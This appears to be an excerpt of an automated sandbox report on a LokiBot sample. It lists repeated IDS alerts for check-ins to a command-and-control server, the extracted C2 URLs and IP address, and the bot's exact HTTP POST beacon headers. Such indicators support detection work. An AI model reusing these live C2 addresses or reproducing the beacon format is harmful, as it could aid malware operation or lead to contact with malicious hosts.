                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 136.244.109.75:80
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://136.244.109.75/index.php/1748937
                Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
